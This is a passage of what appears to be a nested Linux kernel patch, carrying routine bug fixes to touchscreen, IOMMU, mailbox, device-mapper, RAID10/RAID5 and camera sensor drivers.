+ 			sport->mad_agent = NULL;
+ 			memset(&port_modify, 0, sizeof(port_modify));
+ 			port_modify.clr_port_cap_mask = IB_PORT_DEVICE_MGMT_SUP;
+ 			ib_modify_port(sport->sdev->device, sport->port, 0,
+ 				       &port_modify);
+-
++			return 0;
+ 		}
++
++		sport->mad_agent = mad_agent;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/input/touchscreen/raspberrypi-ts.c b/drivers/input/touchscreen/raspberrypi-ts.c
+index 5000f5fd9ec38..45c575df994e0 100644
+--- a/drivers/input/touchscreen/raspberrypi-ts.c
++++ b/drivers/input/touchscreen/raspberrypi-ts.c
+@@ -134,7 +134,7 @@ static int rpi_ts_probe(struct platform_device *pdev)
+ 		return -ENOENT;
+ 	}
+ 
+-	fw = rpi_firmware_get(fw_node);
++	fw = devm_rpi_firmware_get(&pdev->dev, fw_node);
+ 	of_node_put(fw_node);
+ 	if (!fw)
+ 		return -EPROBE_DEFER;
+@@ -160,7 +160,6 @@ static int rpi_ts_probe(struct platform_device *pdev)
+ 	touchbuf = (u32)ts->fw_regs_phys;
+ 	error = rpi_firmware_property(fw, RPI_FIRMWARE_FRAMEBUFFER_SET_TOUCHBUF,
+ 				      &touchbuf, sizeof(touchbuf));
+-	rpi_firmware_put(fw);
+ 	if (error || touchbuf != 0) {
+ 		dev_warn(dev, "Failed to set touchbuf, %d\n", error);
+ 		return error;
+diff --git a/drivers/interconnect/qcom/icc-rpm.c b/drivers/interconnect/qcom/icc-rpm.c
+index 6a9e6b563320b..9047481fafd48 100644
+--- a/drivers/interconnect/qcom/icc-rpm.c
++++ b/drivers/interconnect/qcom/icc-rpm.c
+@@ -11,7 +11,6 @@
+ #include <linux/of_device.h>
+ #include <linux/of_platform.h>
+ #include <linux/platform_device.h>
+-#include <linux/pm_domain.h>
+ #include <linux/regmap.h>
+ #include <linux/slab.h>
+ 
+@@ -499,12 +498,6 @@ regmap_done:
+ 	if (ret)
+ 		return ret;
+ 
+-	if (desc->has_bus_pd) {
+-		ret = dev_pm_domain_attach(dev, true);
+-		if (ret)
+-			return ret;
+-	}
+-
+ 	provider = &qp->provider;
+ 	provider->dev = dev;
+ 	provider->set = qcom_icc_set;
+diff --git a/drivers/interconnect/qcom/icc-rpm.h b/drivers/interconnect/qcom/icc-rpm.h
+index a49af844ab13e..02257b0d3d5c6 100644
+--- a/drivers/interconnect/qcom/icc-rpm.h
++++ b/drivers/interconnect/qcom/icc-rpm.h
+@@ -91,7 +91,6 @@ struct qcom_icc_desc {
+ 	size_t num_nodes;
+ 	const char * const *clocks;
+ 	size_t num_clocks;
+-	bool has_bus_pd;
+ 	enum qcom_icc_type type;
+ 	const struct regmap_config *regmap_cfg;
+ 	unsigned int qos_offset;
+diff --git a/drivers/interconnect/qcom/msm8996.c b/drivers/interconnect/qcom/msm8996.c
+index 25a1a32bc611f..14efd2761b7ab 100644
+--- a/drivers/interconnect/qcom/msm8996.c
++++ b/drivers/interconnect/qcom/msm8996.c
+@@ -1823,7 +1823,6 @@ static const struct qcom_icc_desc msm8996_a0noc = {
+ 	.num_nodes = ARRAY_SIZE(a0noc_nodes),
+ 	.clocks = bus_a0noc_clocks,
+ 	.num_clocks = ARRAY_SIZE(bus_a0noc_clocks),
+-	.has_bus_pd = true,
+ 	.regmap_cfg = &msm8996_a0noc_regmap_config
+ };
+ 
+diff --git a/drivers/iommu/amd/amd_iommu_types.h b/drivers/iommu/amd/amd_iommu_types.h
+index 1d0a70c85333a..5ecc17240eff5 100644
+--- a/drivers/iommu/amd/amd_iommu_types.h
++++ b/drivers/iommu/amd/amd_iommu_types.h
+@@ -1002,8 +1002,8 @@ struct amd_ir_data {
+ 	 */
+ 	struct irq_cfg *cfg;
+ 	int ga_vector;
+-	int ga_root_ptr;
+-	int ga_tag;
++	u64 ga_root_ptr;
++	u32 ga_tag;
+ };
+ 
+ struct amd_irte_ops {
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index 20adb9b323d82..26fb78003889f 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -1657,10 +1657,6 @@ static void do_attach(struct iommu_dev_data *dev_data,
+ 	domain->dev_iommu[iommu->index] += 1;
+ 	domain->dev_cnt                 += 1;
+ 
+-	/* Override supported page sizes */
+-	if (domain->flags & PD_GIOV_MASK)
+-		domain->domain.pgsize_bitmap = AMD_IOMMU_PGSIZES_V2;
+-
+ 	/* Update device table */
+ 	set_dte_entry(iommu, dev_data->devid, domain,
+ 		      ats, dev_data->iommu_v2);
+@@ -2039,6 +2035,8 @@ static int protection_domain_init_v2(struct protection_domain *domain)
+ 
+ 	domain->flags |= PD_GIOV_MASK;
+ 
++	domain->domain.pgsize_bitmap = AMD_IOMMU_PGSIZES_V2;
++
+ 	if (domain_enable_v2(domain, 1)) {
+ 		domain_id_free(domain->id);
+ 		return -ENOMEM;
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index bfb2f163c6914..2bcd1f23d07d2 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -1912,8 +1912,13 @@ static struct iommu_domain *__iommu_domain_alloc(struct bus_type *bus,
+ 		return NULL;
+ 
+ 	domain->type = type;
+-	/* Assume all sizes by default; the driver may override this later */
+-	domain->pgsize_bitmap = bus->iommu_ops->pgsize_bitmap;
++	/*
++	 * If not already set, assume all sizes by default; the driver
++	 * may override this later
++	 */
++	if (!domain->pgsize_bitmap)
++		domain->pgsize_bitmap = bus->iommu_ops->pgsize_bitmap;
++
+ 	if (!domain->ops)
+ 		domain->ops = bus->iommu_ops->default_domain_ops;
+ 
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 56d007582b6fa..e93ca9dc37c8e 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -1237,6 +1237,14 @@ static int mtk_iommu_probe(struct platform_device *pdev)
+ 			return PTR_ERR(data->bclk);
+ 	}
+ 
++	if (MTK_IOMMU_HAS_FLAG(data->plat_data, PGTABLE_PA_35_EN)) {
++		ret = dma_set_mask(dev, DMA_BIT_MASK(35));
++		if (ret) {
++			dev_err(dev, "Failed to set dma_mask 35.\n");
++			return ret;
++		}
++	}
++
+ 	pm_runtime_enable(dev);
+ 
+ 	if (MTK_IOMMU_IS_TYPE(data->plat_data, MTK_IOMMU_TYPE_MM)) {
+diff --git a/drivers/leds/Kconfig b/drivers/leds/Kconfig
+index 499d0f215a8bf..2378cfb7443e4 100644
+--- a/drivers/leds/Kconfig
++++ b/drivers/leds/Kconfig
+@@ -814,7 +814,7 @@ config LEDS_SPI_BYTE
+ config LEDS_TI_LMU_COMMON
+ 	tristate "LED driver for TI LMU"
+ 	depends on LEDS_CLASS
+-	depends on REGMAP
++	select REGMAP
+ 	help
+ 	  Say Y to enable the LED driver for TI LMU devices.
+ 	  This supports common features between the TI LM3532, LM3631, LM3632,
+diff --git a/drivers/leds/leds-tca6507.c b/drivers/leds/leds-tca6507.c
+index 161bef65c6b7b..62a968613cc37 100644
+--- a/drivers/leds/leds-tca6507.c
++++ b/drivers/leds/leds-tca6507.c
+@@ -691,8 +691,9 @@ tca6507_led_dt_init(struct device *dev)
+ 		if (fwnode_property_read_string(child, "label", &led.name))
+ 			led.name = fwnode_get_name(child);
+ 
+-		fwnode_property_read_string(child, "linux,default-trigger",
+-					    &led.default_trigger);
++		if (fwnode_property_read_string(child, "linux,default-trigger",
++						&led.default_trigger))
++			led.default_trigger = NULL;
+ 
+ 		led.flags = 0;
+ 		if (fwnode_property_match_string(child, "compatible",
+diff --git a/drivers/macintosh/Kconfig b/drivers/macintosh/Kconfig
+index 539a2ed4e13dc..a0e717a986dcb 100644
+--- a/drivers/macintosh/Kconfig
++++ b/drivers/macintosh/Kconfig
+@@ -86,6 +86,7 @@ config ADB_PMU_LED
+ 
+ config ADB_PMU_LED_DISK
+ 	bool "Use front LED as DISK LED by default"
++	depends on ATA
+ 	depends on ADB_PMU_LED
+ 	depends on LEDS_CLASS
+ 	select LEDS_TRIGGERS
+diff --git a/drivers/macintosh/windfarm_smu_sat.c b/drivers/macintosh/windfarm_smu_sat.c
+index be5d4593db93e..98fb31e00e203 100644
+--- a/drivers/macintosh/windfarm_smu_sat.c
++++ b/drivers/macintosh/windfarm_smu_sat.c
+@@ -171,6 +171,7 @@ static void wf_sat_release(struct kref *ref)
+ 
+ 	if (sat->nr >= 0)
+ 		sats[sat->nr] = NULL;
++	of_node_put(sat->node);
+ 	kfree(sat);
+ }
+ 
+diff --git a/drivers/mailbox/mailbox-mpfs.c b/drivers/mailbox/mailbox-mpfs.c
+index 853901acaeec2..08aa840cccaca 100644
+--- a/drivers/mailbox/mailbox-mpfs.c
++++ b/drivers/mailbox/mailbox-mpfs.c
+@@ -79,6 +79,13 @@ static bool mpfs_mbox_busy(struct mpfs_mbox *mbox)
+ 	return status & SCB_STATUS_BUSY_MASK;
+ }
+ 
++static bool mpfs_mbox_last_tx_done(struct mbox_chan *chan)
++{
++	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
++
++	return !mpfs_mbox_busy(mbox);
++}
++
+ static int mpfs_mbox_send_data(struct mbox_chan *chan, void *data)
+ {
+ 	struct mpfs_mbox *mbox = (struct mpfs_mbox *)chan->con_priv;
+@@ -182,7 +189,6 @@ static irqreturn_t mpfs_mbox_inbox_isr(int irq, void *data)
+ 
+ 	mpfs_mbox_rx_data(chan);
+ 
+-	mbox_chan_txdone(chan, 0);
+ 	return IRQ_HANDLED;
+ }
+ 
+@@ -212,6 +218,7 @@ static const struct mbox_chan_ops mpfs_mbox_ops = {
+ 	.send_data = mpfs_mbox_send_data,
+ 	.startup = mpfs_mbox_startup,
+ 	.shutdown = mpfs_mbox_shutdown,
++	.last_tx_done = mpfs_mbox_last_tx_done,
+ };
+ 
+ static int mpfs_mbox_probe(struct platform_device *pdev)
+@@ -247,7 +254,8 @@ static int mpfs_mbox_probe(struct platform_device *pdev)
+ 	mbox->controller.num_chans = 1;
+ 	mbox->controller.chans = mbox->chans;
+ 	mbox->controller.ops = &mpfs_mbox_ops;
+-	mbox->controller.txdone_irq = true;
++	mbox->controller.txdone_poll = true;
++	mbox->controller.txpoll_period = 10u;
+ 
+ 	ret = devm_mbox_controller_register(&pdev->dev, &mbox->controller);
+ 	if (ret) {
+diff --git a/drivers/mailbox/zynqmp-ipi-mailbox.c b/drivers/mailbox/zynqmp-ipi-mailbox.c
+index 12e004ff1a147..e02a4a18e8c29 100644
+--- a/drivers/mailbox/zynqmp-ipi-mailbox.c
++++ b/drivers/mailbox/zynqmp-ipi-mailbox.c
+@@ -152,7 +152,7 @@ static irqreturn_t zynqmp_ipi_interrupt(int irq, void *data)
+ 	struct zynqmp_ipi_message *msg;
+ 	u64 arg0, arg3;
+ 	struct arm_smccc_res res;
+-	int ret, i;
++	int ret, i, status = IRQ_NONE;
+ 
+ 	(void)irq;
+ 	arg0 = SMC_IPI_MAILBOX_STATUS_ENQUIRY;
+@@ -170,11 +170,11 @@ static irqreturn_t zynqmp_ipi_interrupt(int irq, void *data)
+ 				memcpy_fromio(msg->data, mchan->req_buf,
+ 					      msg->len);
+ 				mbox_chan_received_data(chan, (void *)msg);
+-				return IRQ_HANDLED;
++				status = IRQ_HANDLED;
+ 			}
+ 		}
+ 	}
+-	return IRQ_NONE;
++	return status;
+ }
+ 
+ /**
+diff --git a/drivers/md/dm-clone-target.c b/drivers/md/dm-clone-target.c
+index 29e0b85eeaf09..e088081b7a8ad 100644
+--- a/drivers/md/dm-clone-target.c
++++ b/drivers/md/dm-clone-target.c
+@@ -2205,6 +2205,7 @@ static int __init dm_clone_init(void)
+ 	r = dm_register_target(&clone_target);
+ 	if (r < 0) {
+ 		DMERR("Failed to register clone target");
++		kmem_cache_destroy(_hydration_cache);
+ 		return r;
+ 	}
+ 
+diff --git a/drivers/md/dm-flakey.c b/drivers/md/dm-flakey.c
+index 7efbdb42cf3b4..3b34270ce607e 100644
+--- a/drivers/md/dm-flakey.c
++++ b/drivers/md/dm-flakey.c
+@@ -124,9 +124,9 @@ static int parse_features(struct dm_arg_set *as, struct flakey_c *fc,
+ 			 * Direction r or w?
+ 			 */
+ 			arg_name = dm_shift_arg(as);
+-			if (!strcasecmp(arg_name, "w"))
++			if (arg_name && !strcasecmp(arg_name, "w"))
+ 				fc->corrupt_bio_rw = WRITE;
+-			else if (!strcasecmp(arg_name, "r"))
++			else if (arg_name && !strcasecmp(arg_name, "r"))
+ 				fc->corrupt_bio_rw = READ;
+ 			else {
+ 				ti->error = "Invalid corrupt bio direction (r or w)";
+diff --git a/drivers/md/dm-integrity.c b/drivers/md/dm-integrity.c
+index 53f9f765df9fd..a2b8f8781a99f 100644
+--- a/drivers/md/dm-integrity.c
++++ b/drivers/md/dm-integrity.c
+@@ -4646,11 +4646,13 @@ static int __init dm_integrity_init(void)
+ 	}
+ 
+ 	r = dm_register_target(&integrity_target);
+-
+-	if (r < 0)
++	if (r < 0) {
+ 		DMERR("register failed %d", r);
++		kmem_cache_destroy(journal_io_cache);
++		return r;
++	}
+ 
+-	return r;
++	return 0;
+ }
+ 
+ static void __exit dm_integrity_exit(void)
+diff --git a/drivers/md/dm-ioctl.c b/drivers/md/dm-ioctl.c
+index 41d55218b0764..83aecd9250ba6 100644
+--- a/drivers/md/dm-ioctl.c
++++ b/drivers/md/dm-ioctl.c
+@@ -1151,10 +1151,13 @@ static int do_resume(struct dm_ioctl *param)
+ 	/* Do we need to load a new map ? */
+ 	if (new_map) {
+ 		sector_t old_size, new_size;
++		int srcu_idx;
+ 
+ 		/* Suspend if it isn't already suspended */
+-		if (param->flags & DM_SKIP_LOCKFS_FLAG)
++		old_map = dm_get_live_table(md, &srcu_idx);
++		if ((param->flags & DM_SKIP_LOCKFS_FLAG) || !old_map)
+ 			suspend_flags &= ~DM_SUSPEND_LOCKFS_FLAG;
++		dm_put_live_table(md, srcu_idx);
+ 		if (param->flags & DM_NOFLUSH_FLAG)
+ 			suspend_flags |= DM_SUSPEND_NOFLUSH_FLAG;
+ 		if (!dm_suspended_md(md))
+@@ -1539,11 +1542,12 @@ static int table_clear(struct file *filp, struct dm_ioctl *param, size_t param_s
+ 		has_new_map = true;
+ 	}
+ 
+-	param->flags &= ~DM_INACTIVE_PRESENT_FLAG;
+-
+-	__dev_status(hc->md, param);
+ 	md = hc->md;
+ 	up_write(&_hash_lock);
++
++	param->flags &= ~DM_INACTIVE_PRESENT_FLAG;
++	__dev_status(md, param);
++
+ 	if (old_map) {
+ 		dm_sync_table(md);
+ 		dm_table_destroy(old_map);
+diff --git a/drivers/md/dm-table.c b/drivers/md/dm-table.c
+index 32b2d3b99d786..3acded2f976db 100644
+--- a/drivers/md/dm-table.c
++++ b/drivers/md/dm-table.c
+@@ -1203,21 +1203,12 @@ struct dm_crypto_profile {
+ 	struct mapped_device *md;
+ };
+ 
+-struct dm_keyslot_evict_args {
+-	const struct blk_crypto_key *key;
+-	int err;
+-};
+-
+ static int dm_keyslot_evict_callback(struct dm_target *ti, struct dm_dev *dev,
+ 				     sector_t start, sector_t len, void *data)
+ {
+-	struct dm_keyslot_evict_args *args = data;
+-	int err;
++	const struct blk_crypto_key *key = data;
+ 
+-	err = blk_crypto_evict_key(bdev_get_queue(dev->bdev), args->key);
+-	if (!args->err)
+-		args->err = err;
+-	/* Always try to evict the key from all devices. */
++	blk_crypto_evict_key(dev->bdev, key);
+ 	return 0;
+ }
+ 
+@@ -1230,7 +1221,6 @@ static int dm_keyslot_evict(struct blk_crypto_profile *profile,
+ {
+ 	struct mapped_device *md =
+ 		container_of(profile, struct dm_crypto_profile, profile)->md;
+-	struct dm_keyslot_evict_args args = { key };
+ 	struct dm_table *t;
+ 	int srcu_idx;
+ 
+@@ -1243,11 +1233,12 @@ static int dm_keyslot_evict(struct blk_crypto_profile *profile,
+ 
+ 		if (!ti->type->iterate_devices)
+ 			continue;
+-		ti->type->iterate_devices(ti, dm_keyslot_evict_callback, &args);
++		ti->type->iterate_devices(ti, dm_keyslot_evict_callback,
++					  (void *)key);
+ 	}
+ 
+ 	dm_put_live_table(md, srcu_idx);
+-	return args.err;
++	return 0;
+ }
+ 
+ static int
+diff --git a/drivers/md/dm-verity-target.c b/drivers/md/dm-verity-target.c
+index 64e8ac429984d..14a9988ec30ba 100644
+--- a/drivers/md/dm-verity-target.c
++++ b/drivers/md/dm-verity-target.c
+@@ -523,7 +523,7 @@ static int verity_verify_io(struct dm_verity_io *io)
+ 		sector_t cur_block = io->block + b;
+ 		struct ahash_request *req = verity_io_hash_req(v, io);
+ 
+-		if (v->validated_blocks &&
++		if (v->validated_blocks && bio->bi_status == BLK_STS_OK &&
+ 		    likely(test_bit(cur_block, v->validated_blocks))) {
+ 			verity_bv_skip_block(v, io, iter);
+ 			continue;
+diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c
+index 9a6503f5cb982..67398394cc9c9 100644
+--- a/drivers/md/raid10.c
++++ b/drivers/md/raid10.c
+@@ -995,11 +995,15 @@ static bool stop_waiting_barrier(struct r10conf *conf)
+ 	    (!bio_list_empty(&bio_list[0]) || !bio_list_empty(&bio_list[1])))
+ 		return true;
+ 
+-	/* move on if recovery thread is blocked by us */
+-	if (conf->mddev->thread->tsk == current &&
+-	    test_bit(MD_RECOVERY_RUNNING, &conf->mddev->recovery) &&
+-	    conf->nr_queued > 0)
++	/*
++	 * move on if io is issued from raid10d(), nr_pending is not released
++	 * from original io(see handle_read_error()). All raise barrier is
++	 * blocked until this io is done.
++	 */
++	if (conf->mddev->thread->tsk == current) {
++		WARN_ON_ONCE(atomic_read(&conf->nr_pending) == 0);
+ 		return true;
++	}
+ 
+ 	return false;
+ }
+@@ -1244,7 +1248,8 @@ static void raid10_read_request(struct mddev *mddev, struct bio *bio,
+ 	}
+ 	slot = r10_bio->read_slot;
+ 
+-	if (blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
++	if (!r10_bio->start_time &&
++	    blk_queue_io_stat(bio->bi_bdev->bd_disk->queue))
+ 		r10_bio->start_time = bio_start_io_acct(bio);
+ 	read_bio = bio_alloc_clone(rdev->bdev, bio, gfp, &mddev->bio_set);
+ 
+@@ -1574,6 +1579,7 @@ static void __make_request(struct mddev *mddev, struct bio *bio, int sectors)
+ 	r10_bio->sector = bio->bi_iter.bi_sector;
+ 	r10_bio->state = 0;
+ 	r10_bio->read_slot = -1;
++	r10_bio->start_time = 0;
+ 	memset(r10_bio->devs, 0, sizeof(r10_bio->devs[0]) *
+ 			conf->geo.raid_disks);
+ 
+@@ -2609,11 +2615,22 @@ static void recovery_request_write(struct mddev *mddev, struct r10bio *r10_bio)
+ {
+ 	struct r10conf *conf = mddev->private;
+ 	int d;
+-	struct bio *wbio, *wbio2;
++	struct bio *wbio = r10_bio->devs[1].bio;
++	struct bio *wbio2 = r10_bio->devs[1].repl_bio;
++
++	/* Need to test wbio2->bi_end_io before we call
++	 * submit_bio_noacct as if the former is NULL,
++	 * the latter is free to free wbio2.
++	 */
++	if (wbio2 && !wbio2->bi_end_io)
++		wbio2 = NULL;
+ 
+ 	if (!test_bit(R10BIO_Uptodate, &r10_bio->state)) {
+ 		fix_recovery_read_error(r10_bio);
+-		end_sync_request(r10_bio);
++		if (wbio->bi_end_io)
++			end_sync_request(r10_bio);
++		if (wbio2)
++			end_sync_request(r10_bio);
+ 		return;
+ 	}
+ 
+@@ -2622,14 +2639,6 @@ static void recovery_request_write(struct mddev *mddev, struct r10bio *r10_bio)
+ 	 * and submit the write request
+ 	 */
+ 	d = r10_bio->devs[1].devnum;
+-	wbio = r10_bio->devs[1].bio;
+-	wbio2 = r10_bio->devs[1].repl_bio;
+-	/* Need to test wbio2->bi_end_io before we call
+-	 * submit_bio_noacct as if the former is NULL,
+-	 * the latter is free to free wbio2.
+-	 */
+-	if (wbio2 && !wbio2->bi_end_io)
+-		wbio2 = NULL;
+ 	if (wbio->bi_end_io) {
+ 		atomic_inc(&conf->mirrors[d].rdev->nr_pending);
+ 		md_sync_acct(conf->mirrors[d].rdev->bdev, bio_sectors(wbio));
+@@ -2978,9 +2987,13 @@ static void handle_read_error(struct mddev *mddev, struct r10bio *r10_bio)
+ 		md_error(mddev, rdev);
+ 
+ 	rdev_dec_pending(rdev, mddev);
+-	allow_barrier(conf);
+ 	r10_bio->state = 0;
+ 	raid10_read_request(mddev, r10_bio->master_bio, r10_bio);
++	/*
++	 * allow_barrier after re-submit to ensure no sync io
++	 * can be issued while regular io pending.
++	 */
++	allow_barrier(conf);
+ }
+ 
+ static void handle_write_completed(struct r10conf *conf, struct r10bio *r10_bio)
+@@ -3289,10 +3302,6 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 	sector_t chunk_mask = conf->geo.chunk_mask;
+ 	int page_idx = 0;
+ 
+-	if (!mempool_initialized(&conf->r10buf_pool))
+-		if (init_resync(conf))
+-			return 0;
+-
+ 	/*
+ 	 * Allow skipping a full rebuild for incremental assembly
+ 	 * of a clean array, like RAID1 does.
+@@ -3308,6 +3317,10 @@ static sector_t raid10_sync_request(struct mddev *mddev, sector_t sector_nr,
+ 		return mddev->dev_sectors - sector_nr;
+ 	}
+ 
++	if (!mempool_initialized(&conf->r10buf_pool))
++		if (init_resync(conf))
++			return 0;
++
+  skipped:
+ 	max_sector = mddev->dev_sectors;
+ 	if (test_bit(MD_RECOVERY_SYNC, &mddev->recovery) ||
+@@ -4004,6 +4017,20 @@ static int setup_geo(struct geom *geo, struct mddev *mddev, enum geo_type new)
+ 	return nc*fc;
+ }
+ 
++static void raid10_free_conf(struct r10conf *conf)
++{
++	if (!conf)
++		return;
++
++	mempool_exit(&conf->r10bio_pool);
++	kfree(conf->mirrors);
++	kfree(conf->mirrors_old);
++	kfree(conf->mirrors_new);
++	safe_put_page(conf->tmppage);
++	bioset_exit(&conf->bio_split);
++	kfree(conf);
++}
++
+ static struct r10conf *setup_conf(struct mddev *mddev)
+ {
+ 	struct r10conf *conf = NULL;
+@@ -4086,13 +4113,7 @@ static struct r10conf *setup_conf(struct mddev *mddev)
+ 	return conf;
+ 
+  out:
+-	if (conf) {
+-		mempool_exit(&conf->r10bio_pool);
+-		kfree(conf->mirrors);
+-		safe_put_page(conf->tmppage);
+-		bioset_exit(&conf->bio_split);
+-		kfree(conf);
+-	}
++	raid10_free_conf(conf);
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -4129,6 +4150,9 @@ static int raid10_run(struct mddev *mddev)
+ 	if (!conf)
+ 		goto out;
+ 
++	mddev->thread = conf->thread;
++	conf->thread = NULL;
++
+ 	if (mddev_is_clustered(conf->mddev)) {
+ 		int fc, fo;
+ 
+@@ -4141,9 +4165,6 @@ static int raid10_run(struct mddev *mddev)
+ 		}
+ 	}
+ 
+-	mddev->thread = conf->thread;
+-	conf->thread = NULL;
+-
+ 	if (mddev->queue) {
+ 		blk_queue_max_write_zeroes_sectors(mddev->queue, 0);
+ 		blk_queue_io_min(mddev->queue, mddev->chunk_sectors << 9);
+@@ -4283,10 +4304,7 @@ static int raid10_run(struct mddev *mddev)
+ 
+ out_free_conf:
+ 	md_unregister_thread(&mddev->thread);
+-	mempool_exit(&conf->r10bio_pool);
+-	safe_put_page(conf->tmppage);
+-	kfree(conf->mirrors);
+-	kfree(conf);
++	raid10_free_conf(conf);
+ 	mddev->private = NULL;
+ out:
+ 	return -EIO;
+@@ -4294,15 +4312,7 @@ out:
+ 
+ static void raid10_free(struct mddev *mddev, void *priv)
+ {
+-	struct r10conf *conf = priv;
+-
+-	mempool_exit(&conf->r10bio_pool);
+-	safe_put_page(conf->tmppage);
+-	kfree(conf->mirrors);
+-	kfree(conf->mirrors_old);
+-	kfree(conf->mirrors_new);
+-	bioset_exit(&conf->bio_split);
+-	kfree(conf);
++	raid10_free_conf(priv);
+ }
+ 
+ static void raid10_quiesce(struct mddev *mddev, int quiesce)
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index 7b820b81d8c2b..f787c9e5b10e7 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -6079,6 +6079,38 @@ out_release:
+ 	return ret;
+ }
+ 
++/*
++ * If the bio covers multiple data disks, find sector within the bio that has
++ * the lowest chunk offset in the first chunk.
++ */
++static sector_t raid5_bio_lowest_chunk_sector(struct r5conf *conf,
++					      struct bio *bi)
++{
++	int sectors_per_chunk = conf->chunk_sectors;
++	int raid_disks = conf->raid_disks;
++	int dd_idx;
++	struct stripe_head sh;
++	unsigned int chunk_offset;
++	sector_t r_sector = bi->bi_iter.bi_sector & ~((sector_t)RAID5_STRIPE_SECTORS(conf)-1);
++	sector_t sector;
++
++	/* We pass in fake stripe_head to get back parity disk numbers */
++	sector = raid5_compute_sector(conf, r_sector, 0, &dd_idx, &sh);
++	chunk_offset = sector_div(sector, sectors_per_chunk);
++	if (sectors_per_chunk - chunk_offset >= bio_sectors(bi))
++		return r_sector;
++	/*
++	 * Bio crosses to the next data disk. Check whether it's in the same
++	 * chunk.
++	 */
++	dd_idx++;
++	while (dd_idx == sh.pd_idx || dd_idx == sh.qd_idx)
++		dd_idx++;
++	if (dd_idx >= raid_disks)
++		return r_sector;
++	return r_sector + sectors_per_chunk - chunk_offset;
++}
++
+ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ {
+ 	DEFINE_WAIT_FUNC(wait, woken_wake_function);
+@@ -6150,6 +6182,17 @@ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ 	}
+ 	md_account_bio(mddev, &bi);
+ 
++	/*
++	 * Lets start with the stripe with the lowest chunk offset in the first
++	 * chunk. That has the best chances of creating IOs adjacent to
++	 * previous IOs in case of sequential IO and thus creates the most
++	 * sequential IO pattern. We don't bother with the optimization when
++	 * reshaping as the performance benefit is not worth the complexity.
++	 */
++	if (likely(conf->reshape_progress == MaxSector))
++		logical_sector = raid5_bio_lowest_chunk_sector(conf, bi);
++	s = (logical_sector - ctx.first_sector) >> RAID5_STRIPE_SHIFT(conf);
++
+ 	add_wait_queue(&conf->wait_for_overlap, &wait);
+ 	while (1) {
+ 		res = make_stripe_request(mddev, conf, &ctx, logical_sector,
+@@ -6178,7 +6221,7 @@ static bool raid5_make_request(struct mddev *mddev, struct bio * bi)
+ 			continue;
+ 		}
+ 
+-		s = find_first_bit(ctx.sectors_to_do, stripe_cnt);
++		s = find_next_bit_wrap(ctx.sectors_to_do, stripe_cnt, s);
+ 		if (s == stripe_cnt)
+ 			break;
+ 
+diff --git a/drivers/media/i2c/hi846.c b/drivers/media/i2c/hi846.c
+index 7c61873b71981..306dc35e925fd 100644
+--- a/drivers/media/i2c/hi846.c
++++ b/drivers/media/i2c/hi846.c
+@@ -1472,21 +1472,26 @@ static int hi846_init_controls(struct hi846 *hi846)
+ 	if (ctrl_hdlr->error) {
+ 		dev_err(&client->dev, "v4l ctrl handler error: %d\n",
+ 			ctrl_hdlr->error);
+-		return ctrl_hdlr->error;
++		ret = ctrl_hdlr->error;
++		goto error;
+ 	}
+ 
+ 	ret = v4l2_fwnode_device_parse(&client->dev, &props);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	ret = v4l2_ctrl_new_fwnode_properties(ctrl_hdlr, &hi846_ctrl_ops,
+ 					      &props);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	hi846->sd.ctrl_handler = ctrl_hdlr;
+ 
+ 	return 0;
++
++error:
++	v4l2_ctrl_handler_free(ctrl_hdlr);
++	return ret;
+ }
+ 
+ static int hi846_set_video_mode(struct hi846 *hi846, int fps)
+diff --git a/drivers/media/i2c/max9286.c b/drivers/media/i2c/max9286.c
+index d034a67042e35..892cd97b7cab7 100644
+--- a/drivers/media/i2c/max9286.c
++++ b/drivers/media/i2c/max9286.c
+@@ -941,6 +941,7 @@ err_async:
+ static void max9286_v4l2_unregister(struct max9286_priv *priv)
+ {
+ 	fwnode_handle_put(priv->sd.fwnode);
++	v4l2_ctrl_handler_free(&priv->ctrls);
+ 	v4l2_async_unregister_subdev(&priv->sd);
+ 	max9286_v4l2_notifier_unregister(priv);
+ }
+diff --git a/drivers/media/i2c/ov8856.c b/drivers/media/i2c/ov8856.c
+index efa18d026ac33..aaf42ece0a11f 100644
+--- a/drivers/media/i2c/ov8856.c
++++ b/drivers/media/i2c/ov8856.c
+@@ -1709,46 +1709,6 @@ static int ov8856_identify_module(struct ov8856 *ov8856)
+ 		return -ENXIO;
+ 	}
+ 
+-	ret = ov8856_write_reg(ov8856, OV8856_REG_MODE_SELECT,
+-			       OV8856_REG_VALUE_08BIT, OV8856_MODE_STREAMING);
+-	if (ret)
+-		return ret;
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_OTP_MODE_CTRL,
+-			       OV8856_REG_VALUE_08BIT, OV8856_OTP_MODE_AUTO);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to set otp mode");
+-		return ret;
+-	}
+-
+-	ret = ov8856_write_reg(ov8856, OV8856_OTP_LOAD_CTRL,
+-			       OV8856_REG_VALUE_08BIT,
+-			       OV8856_OTP_LOAD_CTRL_ENABLE);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to enable load control");
+-		return ret;
+-	}
+-
+-	ret = ov8856_read_reg(ov8856, OV8856_MODULE_REVISION,
+-			      OV8856_REG_VALUE_08BIT, &val);
+-	if (ret) {
+-		dev_err(&client->dev, "failed to read module revision");
+-		return ret;
+-	}
+-
+-	dev_info(&client->dev, "OV8856 revision %x (%s) at address 0x%02x\n",
+-		 val,
+-		 val == OV8856_2A_MODULE ? "2A" :
